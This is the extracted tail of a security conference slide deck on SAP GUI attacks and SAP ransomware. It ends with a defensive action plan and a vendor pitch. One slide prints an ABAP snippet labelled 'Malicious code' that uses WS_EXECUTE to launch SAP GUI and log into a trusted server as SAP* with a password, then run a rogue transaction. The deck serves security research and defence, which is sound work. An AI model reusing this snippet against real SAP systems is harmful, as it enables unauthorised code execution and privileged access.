![Page 65: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/65.jpg)
SAP JAVA GUIRCE
69
• Productive• just execute any program via WS_EXECUTE
• Untrusted• connect user on productive system• execute any program via WS_EXECUTE
![Page 66: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/66.jpg)
Malicious codeUntrusted system
70
CALL FUNCTION 'WS_EXECUTE' EXPORTING
program = ' Gmux\sapgui’commandline= '/H/TRUSTED_SERVER/S/3201&clnt=800&user=SAP*&pass=06071992&tran=MAL_TRANZ’INFORM = '’
EXCEPTIONS FRONTEND_ERROR = 1 NO_BATCH = 2 PROG_NOT_FOUND = 3 ILLEGAL_OPTION = 4 GUI_REFUSE_EXECUTE = 5 OTHERS = 6.
![Page 67: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/67.jpg)
TRUSTED SAP
Loginrequest
successfully logged in systemand execute reconnection to TRUSTED server
UNTRUSTED SAP
Loginrequest
successfully logged in systemand execute malicious ABAP code
![Page 68: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/68.jpg)
demo 3
![Page 69: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/69.jpg)
Solution
The presented SAP GUI for Java attack is possible only when the used R/3 system explicitly allows applications to be executed without any interaction.
Furthermore an attacker has to implement malware on a trusted system beforehand
![Page 70: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/70.jpg)
That’s it? Nope.
![Page 71: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/71.jpg)
"bonus"
![Page 72: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/72.jpg)
One type of malwareMost popular ransomwares - CryptoLocker, TorrentLocker,CryptoWall, Fusob (for mobile)Initial ransom start $150 to $2.000 (Cryptomix)
ransomware
![Page 73: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/73.jpg)
ransomware
![Page 74: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/74.jpg)
"bonus" video
![Page 75: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/75.jpg)
Defending againstSAP ransomware attacks
![Page 76: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/76.jpg)
Recap: Attack Chain 80
![Page 77: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/77.jpg)
What failed?81
![Page 78: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/78.jpg)
Action Plan
1. Patch saprules.xml on all SAP GUI for Windows clients
• see SAP Security Note 2407616 for more details
2. Scan for SAP vulnerabilities on application servers and develop a remediation plan
3. Check all ABAP programs for presence of malicious code
4. Configure SAP security audit log and other sources
5. Develop an approach to detect SAP security threats:
• manual review of SAP security events
• configure IDS to detect SAP attack signatures
• connect logs to SIEM
• review privilege accounts activities
82
Send you questions
and requests
![Page 79: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/79.jpg)
83
![Page 80: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/80.jpg)
How We Can Help? 84
SAP Security Consulting:• Implementation of SAP Vulnerability
Management process• SAP security plans, architecture and
project documents expertise• SAP risk assessment
ERPScan Monitoring Suite:• SAP vulnerability assessment• Source Code scanning• Segregation of Duties
assessment
SAP Penetration Testing:• simulate external and internal attacks• provide a list of vulnerabilities• escalate privileges and show you how
much data can leak• try to reach connected systems• estimate overall harm to business
operations
SAP Security Audit:• security assessment of network, OS,
DBMS related to SAP• SAP vulnerability assessment;• security configuration checks• critical access control checks• custom code security review (optional)• segregation of duties analysis (optional)
![Page 81: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/81.jpg)
Thank you 85
Michael RakutkoHead of Professional Services
Dmitry Chastuhin Lead SAP Security Analyst USA:
228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
HQ Netherlands:Luna ArenA 238 Herikerbergweg, 1101 CM Amsterdam
![Page 82: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/82.jpg)
86